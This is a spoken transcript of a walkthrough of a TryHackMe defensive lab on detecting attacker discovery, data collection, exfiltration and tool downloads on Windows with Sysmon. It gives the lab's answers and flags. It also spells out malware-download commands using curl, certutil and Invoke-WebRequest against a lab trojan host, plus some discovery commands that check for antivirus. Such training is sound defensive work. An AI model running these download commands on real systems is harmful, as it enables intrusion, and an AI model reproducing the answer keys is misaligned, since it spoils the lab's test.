Hello everyone, today we're going to be covering the Windows Threat Detection 2 Premium Room. It's a premium room from TryHackMe, and in this room we're going to discover how to detect and analyze the first steps of threat actors after breaching Windows, and also we have Echo here to help us out with real-time guidance, personalized hints, and explanations. Awesome. So let's get started. With Task 1, Introduction. After breaching a host, threat actors are faced with a choice, and before I continue, for a brief introduction, my name is Joshua Spisak. I'm a cybersecurity analyst and Blue Team content creator. So let's resume with Task 1 Introduction. After breaching a host, threat actors are faced with a choice: quietly establish a backdoor to maintain long-term access, or take immediate action to achieve their objectives. This room covers the second approach and continues your Windows threat detection journey by exploring what typically follows the initial access, beginning with discovery and collection. So here are our learning objectives here. We're going to detect common discovery techniques using Windows Event Log. We're going to learn how to trace the attack origin by reconstructing a process tree. We're going to find out what data threat actors look for and how they exfiltrate it. And also we're going to see how the malicious commands are logged by running them yourself. There are some prerequisites to help you out with better understanding the concepts in this room, such as recalling the basics of minor tactics and Windows logs. Completing the previous room, I have a YouTube walkthrough for the Windows Threat Detection 1 room. So just check out my YouTube channel and you will see the walkthrough for Windows Threat Detection 1. And be ready to continue your Windows Threat Detection journey. So if we open these in a new tab, you'll see the MITRE room here. Awesome. And different resources. Highly recommend this room because it's going to help you better understand the various resources that MITRE has made available to the cybersecurity community. One of the most important ones is the attack framework, which is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. And the attack knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, in the cybersecurity product and service community. Also, the MITRE Attack Framework is completely free to use, and overall, it's just a really great resource. So, here we go. Here's the URL. So, like I said, MITRE Attack is open and available to any person or organization for use at no charge. So, I highly recommend bookmarking this because it's going to help you better understand adversary tactics and techniques, and all of this based on real-world observations, and it's being constantly maintained and updated. Really handy resource. Awesome. And also, here's the Windows login for SOC room to better understand Windows logs. Also, I have a walkthrough for this on my YouTube channel. So just type in my name, Joshua Spisak, and you'll see Windows login for SOC and Windows Threat Detection 1 YouTube walkthroughs for you to follow. Awesome. So that being said, let's get started. Lab access. Before moving forward, start the lab by clicking the Start Lab Machine button below. So we will do that. It should turn on. Nice. The VM will open in split view, which we see here, and we will need about 2 minutes to fully load. In case the VM is not visible, you can click the Show Split View button at the top of the page. And here's your credentials if you can access the VM from your own VPN connected machine. The credentials below. So give this time to load, and you will continue with the tasks. This is going to be fun. Awesome. Get time to load. Yes, we should see the IP address in about roughly less than 20 seconds. So that way, alternatively, you can access the VM from your own VPN connected machine with the credentials below. So yes, you'll see the IP address and his username and password. Nice. Yeah, this room is it's taking its time, but it did say roughly about 2 minutes to load, so get the time to load. Learning objectives, prerequisites, and lab access. Awesome. Credentials. Also, once we start the room, let's start. No answer needed. Correct answer. Nice. All right, now, Moving on to task 2, discovery overview. Alright. Situational awareness. After the criminals pass through the front door, do they know what's behind the door? Most do not. So they will start searching the rooms. Maybe there is a hidden treasure, but maybe a trap ready for action. Same for the cyber threat actors, who need to understand the environment, its value, and its security tools that can disrupt the attack. This process is mapped to the MITRE discovery tactic, which we will cover in this task. So we see here, after initial access, discovery is a really good tactic to understand, such as what is the host purpose? Is the host a part of a network? Or what privileges do I have? And also, before we continue, let me define and give more background information for what the discovery is. So what the discovery tactic is that the adversary is trying to figure out your environment. Discovery consists of techniques, which is the how, an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orientate themselves before deciding how to act. They also allow adversaries to explore what they can control and what's around their entry point in order to discover how it can benefit their current objective. Finally, native operating system tools are often used toward this post-compromise information gathering objectives. So overall, what I want you guys to get from the discovery tactic is that the adversary is trying to figure out your environment, and discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. Nice. And now we got our lab machine on the right. Sweet. All right, moving on. Discovery commands. The first questions you may have once you wake up from a dream night might be, who am I and where am I? The same is true for threat actors that might have sent thousands of phishing attachments to emails. Naughty. They knew but managed to breach only a couple of systems they saw for the first time. So, they need to find out the victim's details. So we got discovery purpose on the left. We got the common command, PowerShell commands on the right. For example, for files and folders, to find out the host purpose, victim's job, or the interest, you would see these common CMD and PowerShell commands here. And two really great websites that I want to mention are these. SS64 and Explain L. Alright. Awesome. Cool. Alright. Yes. Alright, so what the SS64.com website does is that it's a command line reference for CMD, PowerShell, Linux. You probably have seen me use it in my previous walkthroughs, but if you haven't, don't worry. I'm going to show you guys a brief demonstration on how to use the website. So, for instance, say we wanted to learn more about type. We would type in type and say CMD. Oh, actually, you would see an A to Z index of Windows commands. Nice. We can go back and type in type. Enter. And it's going to show us the reference. Nice. All right, type. Display the contents of one or more files. And here's the syntax. If more than one file is specified, the file names are included in the output. And if a wildcard is used, the file names are displayed if only one file matches. And the file names are printed to error stream and so can be hidden by redirecting to null. Type this. Got some error levels and examples. So if you wanted to learn more about how to use type, check out the example section. Awesome. And Explain Shell. What Explain Shell does is that, say you wanted to do, for example, let's just say get. Okay, let me just do who am I? There we go. Who am I? Who am I? It's going to break down the commands and overall break down the command more. So let's just say, for example, we wanted to look into this. For the active antivirus section, we're going to copy this. We're going to paste. No man page for get who am I. Alright, so it's on the Linux. Gotcha. Makes sense. But overall, if you wanted to learn Explain Shell to get more information pertaining to a command line such as who am I? Okay, actually that's command. Just overall, Explain Shell is like ss64.com. It's a helpful website to help you better understand commands, command lines, such as the examples below. Awesome. Oh, come on. Come on, technology. Connecting to your remote machine. That's not a discovery command, by the way. It's trying. Let me try again. Alright, let's do that. Alright. Moving on. So we got our discovery commands on the right, and we got our purposes such as files and folders, users and groups, to find out who uses the host and with which privileges, systems and apps, to find out vulnerabilities or apps to steal data from, and network settings, to find out if the host belongs to a corporate network, and active antivirus. To find out how risky it is to continue the attack without being blocked. Alright. Now for the discovery purpose. Recall the phishing attack chain from the previous room. After the attachment is launched, it runs basic discovery commands to identify the victim or even delete itself if a specific antivirus is installed or a victim is not from a targeted company or country. Then, it connects back to the threat actor, giving full control over the victim. From there, human attackers can type additional discovery commands if required, such as these. And for this task, access the attached VM, which you have done, and try to run the discovery commands yourself. So once this machine gets back online, hopefully, we will run these commands so that way I can show you guys how to do these questions and how to answer them. Awesome. And then we're going to do these tasks. Sweet. So we should be good to go really soon. Alright, come on. Connecting to remote machine. Well, it is trying. Dedicating to remote machine. Let's go analyze your actions. Yes, here is Echo. To help us out with real-time guidance, personalized hints, and explanations. Alright. Alright, let's see if looks like this is a bad machine. I'm going to start a new one. And hopefully that works this time. Alright. Let's go to the next task. And then once the machine is back online, we'll come back and answer these questions. Sweet. Alright, task 3. Moving on to task 3, detecting discovery. Alright. Discovery via CMD. Discovery via the command line is the most common and easiest method available for threat actors. This is because it simply uses the existing commands like whoami or ipconfig that are available on all Windows machines by default. You can check out this article for a real-world attack example. So we will do that. because you like learning. All right, Black Suit from DAFR report, awesome reports. We see for Windows utilities, the threat actor performed several discovery commands using various Windows utilities at various times during the intrusion, such as system info, net group, test, and much more. So you can see in real world observations discovery commands being used by threat actors for their intrusions. So that was awesome. All right, luckily for the defenders, most of the launch commands are logged as new processes, like on the process tree below. So, discovery commands coming from invoice.pdf.exe, that could be a phishing attachment that was downloaded by, unfortunately, a victim, which we see in the downloads folder. And then after that, we see discovery commands such as ipconfig, which shows network settings, whoamipriv, show user permissions, dir, this current directory, net user, list all local users, task lists, show running processes, and wmic computer system get model, query for laptop model, and then PowerShell, get service, list active services, and get -np preference, check MS Defender settings. There we go. Okay, come on. Please work. Please. Thank you. Awesome. The machine works. So let's answer these questions. All right. Open. Yes. It works. All right. Oh, we got Python. Awesome. All right. Command prompt. CMD. Yes, I want command prompt. There you go. We're going to open this and type net user administrator. And we want to figure out which privileged group does the user belong to. And we can see here the group is going to be administrators, which is going to be a local group. And this is username administrator. So this is a built-in account for administrating the computer domain. And also we can see that there's an asterisk here. So this means that this could be a privileged group. So our answer is going to be administrators. But also we can do net user administrator local group. I believe that should give us our group. Net. Alright, let me just do check the minimum password length. Administrator. Anyways, for the local group we see here administrators. That's going to be our answer for the which we got. All right, now open event viewer and try to find your command in sysmon logs. What is the image file of the net command you just run? So let's go look at event viewer. And since we saw in the previous question, next task, we should see the logs in sysmon and use event viewer. Nice. So we're going to go to Windows, applications. All right, come on. Hey. Are you online? Yes, you are. There we go. Just need time. Alright. Microsoft. It should be here. Windows Sysmon. Sysmon. Operational. Let me see if I view this in full screen. Can I do that? And let's try to find the command which we ran and then figure out the image field of the net command you just ran. So let's use find, and let's try to find net. All right, net. Oh, net user. That should make it easier. Net user administrator. Okay. Net. So what is it doing? Net user administrator. So this is going to show us, it showed us the command that I ran after net user administrator. But we can see that the parent image is net.exe, and so we want the image, original file name, net1. Net1, oh! So if I do net this, alright, you should see net user administrator group. So I'm just going to filter by 1 so we can see the processes, because the commands are logged as event ID 1. We're going to do that, and then we're going to look at commands. Let me just make this easier on the eyes. Details. Nice. Net1 user group. Let me sort this by ascending. And task manager, login, auto check. CRS. When login, SAS. And let's see. Let me just do find. There you go. Next. Net.exe. Net user administrator. There we go. That's our command. And our image is going to be C Windows System32 command.exe. Well, we want, no, here you guys. Here it is. Image still Windows System32 net.exe, which matches our answer. Nice. And just for clarification, I have completed this room already, but I'm helping you better understand my problem solving methodology so that you understand how to get to the answer. Alright, now, task 3, detecting discovery. We discussed about the commands. And now we're going to discuss about discovery via the GUI, which stands for Graphical User Interface. In cases where threat actors log into the system interactively, like after the RDP breach, they're not limited to console commands, but they often use them anyway as a habit. With access to the graphical interface, nothing prevents attackers from using the same cool toolkit as you do. Apps and programs, system settings, disk management, or even a web viewer. In this scenario, you won't see typical who am I commands, but rather a process tree. It looks like this. So you see command. Attacker can still use command. We see some discovery activities such as open computer management, list network adapters, access setting panel, view text file, and run task manager. Additionally, for detecting discovery, the first task to detect a potential discovery is to find a discovery command, or better, a sequence of commands run during a short period of time. You'll see them as process creation events tracked by sysmon, event ID 1, or as new rows in the PowerShell history file. Before I continue, I want to show you guys another helpful resource, and that is the DFIR reference. You can see my previous walkthroughs. You probably have seen this website, but if you haven't, let me explain what it is. So what this website is, which is the windows-forensics-reference.com, an overall DFIR reference. For the Windows side, it contains self-contained offline capable DFIR reference pages for Windows artifact analysis. You can also download any tool as a single HTML file and use it anywhere. And since we're talking about Sysmon, they have a Sysmon event ID reference section. If you click on it, it's going to help you better understand all of the, well, it is a complete reference for all Sysmon version 15.2 event IDs sourced from Microsoft sysinternals documentation. It includes key fields, forensic value, noise level, and configuration guidance. So that way, if you wanted to better understand a certain Sysmon event ID, you have that information right here, and it's very comprehensive. Very awesome. So, highly recommend checking out this resource and bookmarking it because I believe you'll find this resource valuable. Nice. All right. Now, there are lots of discovery commands, so be prepared to use the search engine, Google for example, if you're not sure what the command means. Next, it is important to find out where the commands are coming from. Commands like ipconfig are often used by IT departments and legitimate tools, and you don't want to create panic just because your coworker checked your IP. For this room, you can build a process tree using Sysmon logs, filter for process creation events, event ID 1, and correlate process ID and parent process ID fields, like in the example below. So, since for example, discovery process ID, parent process ID, command ipconfig, directory downloads, then we see that the parent process ID here becomes the process ID here, start from cmd, command cmd.exe. Then the parent process ID becomes now the process ID for the phishing invoice, command invoice.exe, directory still downloads, and now the parent process ID for phishing invoice now becomes the graphical invoice process ID, command explorer.exe. And we can see here everything started from explorer, no, command.exe, and then we saw the discovery commands here. So it is very important to understand how to create a process tree so that we overall understand how the overall timeline and overall activity that happened from one part to another. Very handy skill, which is process tree analysis. All right, now for this task, we're going to open the VM, which I'm on. I am going to open split view. Can I open split view? Yes, I can. Can't. All right, connecting. You need to see that. All right, for task 3, we are going to run a phishing attachment sample located at C users administrator desktop practice task 3 invoice.pdf.ac. And then we're going to answer questions based on that activity. So let's do that. All right, connecting. Alright, let me see how I do this. Okay. Technology does not want to cooperate today. So I'm going to terminate this machine again. Bah humbug. We're going to terminate this machine and we're going to start a new one. So with that being said, once the lab machine starts up, we're going to answer these questions. But I'm going to move on to the next task to keep the walkthrough going. Alright, so now transitioning to task 4, collection overview. Searching secrets. Continuing our scenario, what would the criminals do after they explored all rooms in the apartment, found out who the owner is, what valuables they hide, and what traps are in place? They grab the actual treasure, something that can be sold or is valuable for the threat actors. And this process involves three more minor tactics: collection, credential access, and exfiltration. To make it simpler, let's treat credential access as part of collection. So if you wanted to learn more about these tactics, we can do open link in new tab, and we'll get more information. Alright, so that being said, collection is the adversary is trying to gather data of interest to their group. And collection consists of techniques adversaries may use to gather information about the sources. Information is collected from that are relevant to following through on the adversary's objectives. And frequently, the next goal after collecting data is to either steal, exfiltrate the data, or to use the data to gain more information about that target environment. Common target sources include various drive types, browsers, audio, video, and email. And common collection methods include capturing screenshots and keyboard input. Now for credential access. The adversary is trying to steal account names and passwords. And credential access consists of techniques for stealing credentials like account names and passwords. And techniques used to get credentials include key logging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals. For exfiltration, the adversary is trying to steal data, and exfiltration consists of techniques that adversaries may use to steal data from your environment. From your network. Once they've collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. And finally, techniques for getting data out of a target network typically include transferring it over their command and control channel, or an alternate channel. It may also include putting size limits on the transmission. So now that we better understand exfiltration, credential access, and collection, let's move on. Alright. I'm going to just keep it at split view because we've been having issues. Alright, that's answer task 3. So let's let's open the practice folder, task 3 folder, and then run invoice.pdf.exe, and then we're going to look at sysmon logs and overall logs to answer the questions. Let's run this. Oh, this looks nasty. Loading hotfix information. Very nasty. I want to see if I can do. Now, since we got the information, let's go look at our sysmon logs with event viewer. So let's do that. Event. It's gonna be fun. Event viewer. If I can spell correctly. Nice. I can. Alright, now let's go look at sysmon logs. It's going to be application and services logs. Expand. Oh, nice. Okay, good. That still works. Alright. Microsoft, Windows, and then let's go find sysmon. Let's go look at sysmon logs. Operational, and then we're going to now look for process creation events. So let's minimize. So let's do that, and then filter by 1. Event ID 1, process creation, and then we're going to sort by ascending order. There we go. And now looking at sysmon logs, what is the first command the invoice.pdf.exe executes? So let's filter let's define invoice.pdf.exe. Invoice. There we go. Invoice.pdf.exe. And we see, no, I don't see HTC Windows Explorer. So let's keep going down. See one up. See Bard. See Bard doing invoice at broker. IP clip. Select a task manager. Looking at sysmon logs. Process tree. What is room filtered by process creation events, which I have done. Yes. Now let's go find invoice. Actually, alright, here we go. Invoice.pdf.exe. C Windows System 32 command.exe. So let's look at CMD. And let's see what is here. CMD. I see CMD collecting. I see. Actually, let me filter by these commands to see which one was the first command. So let's start with who am I? So let's find who am I? Find X. Awesome. All right, we got who am I? .exe. And our image should be PDF. PDF. Who am I.exe. And there we go. Parent image. Invoice.pdf.exe. So we can see that the parent and then a command after that was who am I? Awesome. All right, next. Which command did the malware use to check the presence of MS Defender EDR? And so yes, yes. So we can see that who am I and then systeminfo.exe. So who am I would be the first command. Nice. All right. So presence of MS Defender EDR. Let's go find. Let's search MS Defender EDR. All right. We can see a command. I see command C task list. -v find string mssense.exe echo no msdefender.exe. So what this command does is that it will check the presence of MS Defender, and that's going to be our answer. Nice. All right, now to which domain did the malware send the discovered data? So for this, I believe it is going to be, since we're talking about domain, we're going to go look at DNS events. So using sysmon event ID reference, event ID is going to be 22. So let's filter 22. And let's find invoice. And that is our domain exfil.bcz.cafe. Cool. All right, now task 4, collection overview. I already mentioned this, so now we're going to talk about collection targets. And they're going to make it easy on the eyes. All right, come on. Stay. Good. The targets drastically differ depending on the attacker's goals. Some adversaries hunt personal info like images or chat conversations. Others look for crypto wallets, gaming, or banking accounts. And advanced groups just use the victim to access the corporate network, hoping for a full-scale ransomware encryption. Note, that while most of the sensitive data is stored as simple files, the secrets can also be hidden in the registry or in process memory. You can review the common collection targets in the code block below, such as the goal, black veil victim, photos, chats, browser history, which you can see here. The goal to steal money, web banking sessions, and crypto wallets. Or the goal to steal corporate data, SS credentials or databases. These are the folders. And now for exfiltrating data. Data collection can be performed automatically via scripts or manually by human threat actors. For scripts, the whole process usually takes less than a minute, but it may take hours for the attacker to find and review the interesting files. Still, both methods should eventually end with exfiltration, uploading stolen data to a controller server. Here, threat actors can be very creative to avoid detection. They often exfiltrate stolen data to Dropbox, Mega, Amazon S3, or other trusted cloud service storage services. See examples here. So just exfiltration over web service, exfiltration to cloud storage. Awesome. So we can see the groups and what they did. Associated with using different trusted cloud storage services. Yeah, MITRE ATT&CK is awesome. Yes. Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the internet. Examples of cloud storage services include Dropbox and Google Docs. And finally, exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. Let's keep that in mind. And we got exfiltrate storing data to known code repositories like GitHub or messengers like Telegram. Easy examples. SockRadar, you are awesome. Offer Telegram bot feature that informs users. I am not affiliated with them. They just... Oh, Checkpoint. Great resource. Awesome. All right, offers the Telegram bot notification feature that informs users. You can see here. Credentials. Cool. All right. Highly recommend checking out the resources. Yeah. Or just create a trustworthy looking domain like windows-updates.com and send the data there. All right. For this task, we're going to continue the attached VM on the right. And we're going to try to find the data to collect. So we're going to answer these questions here. What is the Facebook password that the user saved in Chrome? So we're going to go to Chrome. If it can load. Please load. Awesome. We're going to go to passwords and autofill right here. And then password manager. Google Password Manager. We're going to try on the Facebook and we're going to try to find the Facebook password. And administrator. Do I have the password? Wait, do I need to? Ah. Let me see if I have the password in a previous task, which I should. Administrator secure. And what's task for? Our password is going to be for facebook.com. It is going to be this. Awesome. All right, next. Which interesting SSH key does the user store on disk? We're going to start our search from C users administrator. We're going to open a command prompt. And then we're going to type dir and then .ssh. So we're going to do, let's see what that is. .ssh. cd.ssh. dir. And we see thm-access-database.key as our interesting SSH key under the .ssh directory. Nice. All right, now what is finally What is a secret PDF file explaining TryHackMe's internal network? Look for the file on the desktop, downloads, and documents. So let's do that. Let's go back. Look for CD downloads. There. And we see a thm-network-diagram-2025.pdf. Let's go see what that is. And it's showing us TryHackMe's internal network explanation. Awesome. thm-network-diagram-2025.pdf is our answer. All right, moving on to task 5, detecting collection. Same as with discovery, threat actors can use both command line and graphical interface options to review sensitive files. However, in collection, threat actors don't just check a system configuration, but rather look for specific files and folders shown in the previous task. Thus, you can detect access to the files by tracking commands like these, such as Notepad, commands, PowerShell. So these commands, track these, and we got descriptions on the right. For example, for the first one, threat actors use Notepad to check contents of the interesting file finances-2025.csv. Next, we see that threat actors search for the password keyword with find string in a specific file, and that file is passwords.txt. And then the threat actors search for PDF files in the user's home folder, which you see here. And then we see more examples such as the threat actors copy single chat history to the temp directory, archive the stolen data preparing for exfiltration, because you see .zip here, and compress.archive mentioned. And finally, alternatively, threat actors can use the existing archiving software like 7-zip. Now for collection examples. During manual collection or when using scripts, you'll see basic commands and processes covered in the previous task. In this incident, which we can click here to better understand it, more really beneficial resources. Awesome. You'll see basic commands and processes covered in the previous task, and you'll see in this incident and overall in this report. Threat actors simply used Notepad and WordPad to open files of interest and then use 7-zip to archive all files at once. As you may see from the screenshot here, the actions were easily detected with sysmon event ID 1, which is associated with process creation. We can have the report here in the name. Highly recommend checking it out. All right, now data stealers. Collection be formed by human threat actors is typical for breaches of big networks, where the attacker knows their target and spends much time looking for data to steal. However, attacks, please work. Okay, good. Machine is still working. However, attacks targeting simple personal workstations rarely involve human attacker, and data collection is performed by a data stealer. Specialized malware to automate collection and exfiltration. For example, Gremlin Data Stealer, a single malicious file, steals VPN profiles, cryptocurrency wallets, web browser sessions, Steam, Discord, and Telegram data, and even takes screenshots of the victim's host. You can read the details in this Unit 42 blog post, which we can see here. So overall, really great resources. Malware, Gremlin Steal for sale on Telegram. Yes, they got a lot of sections. So highly recommend checking this out because it's going to help you better understand the Gremlin Stealer and how it operates. Such as this information stealing malware exfiltrates data from its victims and uploads this information to its web server for publication. It can capture data from browsers, the clipboard, and the local disk to steal sensitive data, such as credit card details, browser cookies, crypto wallet information, file transfer protocol FTP, and virtual private network credentials. Nice. All right, now for this task, we're going to run a simple data stealer sample and analyze its actions in logs. So let's go do that. Let me exit this. Now I got logs. And let's go run task 5. It's going to be desktop practice. Stealer.exe. Let's execute it. It's doing its thing. And now let's go look at logs to answer these questions. Awesome. Alright, looking at system logs, what directory does the stealer create? So let's filter by process creation events. So instead of 22, we're going to filter by 1. So 1 out of 11. 1. Nice. We can see here we're filtering by process creation events. And then we're going to filter, we're going to find stealer. And let's go see what directory the malware created. Directory was created. Explorer. Alright. Keep scrolling down. Alright, we see here stealer.exe and explorer.exe. So let's scroll down. See CMD. So I see command line, and I see a directory was made, and it is staging 58F1. Nice. Alright, now which 3 file extensions does the malware search for? Format, separated by comma in alphabetical order, such as batch or text. So let's go do that. Let's figure out what file extensions does the malware search for. So let's scroll. Let's look for here. PowerShell. I see clipboard.txt. So that is not one of the file extensions. CMD, xcopy. Using profile staging. Let's go see here. Xcopy again. AWS. More AWS stuff. Command SSH. Command. Oh, I see docs. Okay. So we see here that the malware was searching for .docs. We can see your staging thing, which is going to be the directory that the stealer creates. Next, we also see docs. So we got our first one. Now we got CMD again. We see PDF and associated with the directory that the malware created. So docs and PDF. And I believe we need a third one. It's going to be, oh, we got PDF. .xls, Excel file, in the directory that the malware created. So our answer is going to be .docs, .pdf, docs, PDF, and XLSX in alphabetical order. Our next, which PowerShell commandlet does the malware use to get clipboard content? So let's use find and filter by clipboard. On second thought, let me just do PowerShell. All right. And since we're talking about commandlet, let's look for get. All right. Let's see what we got. We got get. So we got get. Does the malware use? So let me filter, no, okay, let me find stealer, because we want to see the stuff that the malware did. Okay, let's go here. See power commandlet. PowerShell. Okay, we got PowerShell, and we see that get dash clipboard mention, and clipboard.txt. And if we do some researching, what is get-clipboard? I believe for type, for 64, I should be able to enter get-clipboard-PowerShell commandlet. This gets the current Windows clipboard entry. So let's see if get-clipboard is our answer. Awesome. All right. Which domain does the malware exfiltrate the data to? So since we're talking about domain, we're going to filter on event ID 22 because that's going to show us DNS query events. And we are looking for malware. So filter, no, find, cancel. All right, close the program. All right, I need to open up Event Viewer again. And I'm going to find the domain. And the malware exfiltrates to. So we're going to filter by 22. And then we're going to filter again. So we see DNS query. And we're going to find Stealer to see event logs associated with the malware. All right. And I see our first domain is going to be collected data-storage-2025.s3.amazon.aws.com. And our malware is mentioned stealer.exe. Awesome. And we have a hint. You should see the logs as soon as the exfiltration starts. No need to wait for it to finish. And we see here in the logs. This is our answer. Our next, task 6, ingress tool transfer. Alright. Recall the previous room explaining how attacks start, not from a fully functional malware, but from a tiny phishing attachment or from an RDP session without any red team tools. Thus, at some attack stages, threat actors may need to download more tools to achieve their goals. For example, you can see the ones listed here, such as a script to automate discovery and find common vulnerabilities like seatbelt, a tool to extract safe passwords or OS credentials like Mimikatz, a fully functional remote access Trojan rat like Remco's rat. I'm on machine. Please work. Yes. Finally, a ransomware binary to encrypt the system after the data is stolen. In the process of downloading additional malware to the breached system is mapped to the minor ingress tool transfer technique. So if you click on this, we'll see for more information here. And more about ingress tool transfer. Adversaries may transfer tools or other files from external system into a compromised environment. Tools or files must be copied from external adversary control system to the victim network through the command and control channel or through an alternate protocol such as FTP. Once present, adversaries may also transfer spread tools between victim devices within a compromised environment. We see, for example, on Windows here. Awesome. Cool. And it's used in the majority of breaches. You've already seen an example where a link attachment used PowerShell to download additional malware, but there are many other ways to transfer malware even without PowerShell. Let's just common transfer methods. Alright. Why can't the threat actors just include all they need into a single phishing attachment? You may ask. There can be different reasons. but the common ones are to bypass antivirus by splitting the malware into multiple parts and to minimize exposure of their tools exploits in case they're caught right in the beginning. Some commands can be listed here, and command PowerShell commands on the right. And for via graphical interface, no need to use CMD, just copy paste malware via RDP or download them via a web browser. Alright, now detecting tool transfer. Since a transfer requires a network connection, your best option would be to track a network connection or a DNS request from the suspicious process. Note, however, that threat actors often try to avoid detection by downloading the tools from legitimate services like GitHub. So make sure to analyze which process is making the connection, the destination domain, and the file being downloaded. And the screenshot below shows a complete event chain from beginning to end. Nice. Actually, yes, from beginning. There we go. Alright, to complete this task, start from opening the URL here on the VM and open the URL directory in the VM's browser. The additional tools need to be installed. Alright, so once we got this opened, we're going to answer some questions. Nice. So let me type HTTP apps for free .tm Trojan AC. And we got our flag. THM just used web browser. Nice. Alright, next. Open CMD and download the file from the same URL using curl.exe. What is the flag in the response? So let's go do that. Open up command prompt and run the curl command. So curl exe, the domain is going to be this, HTTP apps for free.thm trojan.exe. And then let's run this. Let's see where our flag is. THM curl is cool. Alright, next. Continue with the same command and URL, but now using certutil.exe. What is the flag in the response? So what we are doing is that we are getting experience using common CMD PowerShell commands associated with the technique. Actually, tactic. There we go. Tactic ingress tool transfer. There we go. And next, we're going to use certutil, I believe. Yes, certutil.exe. So let's do that. Certutil.exe. Dash URL cache. Dash F. HTTP. Apps for free.thm. Trojan.exe. And we got our command, THM abusing certutil. We got our flag. Now finally, download the same file using PowerShell IWR. What is the flag and the response? Alright, so if you don't know what invoke-web request is, don't worry. I'm going to help you guys better understand it. So PowerShell invoke. Okay. Invoke dash web request. There we go. Invoke dash web. Let me see if I can spell it. Web request. And what this does is that it gets content from a web page on the internet, such as the syntax, keys, a lot of keys, and much more. Nice. Alright, so overall, invoke-web request, it gets content from a web page on the internet. So we're going to use PowerShell. PowerShell-C invoke dash web request dash URI http apps for free.thm trojan.exe. And we see our flag, power of PowerShell. Awesome. Now task 7, conclusion. Congratulations on completing the room. Very nice. It is hard work keeping all the stages and commands in mind, but knowing what happens after initial access is vital to hunt down the threat before it can cause a major impact. And here are our key takeaways here. Discovery usually happens immediately after initial access and can be detected in Sysmon. Discovery focuses on identifying the victim, but collection focuses on acquiring sensitive data. At any time of the attack, threat actors can exfiltrate the data, stolen data, or download new malware. And threat actors do not start with all the tools they need, but download new malware only if necessary. I'm going to answer the questions below. I'm ready to continue the journey. No answer needed. Correct answer. We did it. Even though the machine was doing this a lot. Alright, let me terminate this. Nice. Alright. Hopefully you enjoyed my Windows Threat Detection 2 Premium Room TryHackMe walkthrough. We completed all the tasks. And these were some of the resources that we used in the room to better understand the content of the room. And overall to answer the questions. There you go. And Google. Alright. I will see you guys in the next walkthrough. Have a great day and keep up the great work. Peace.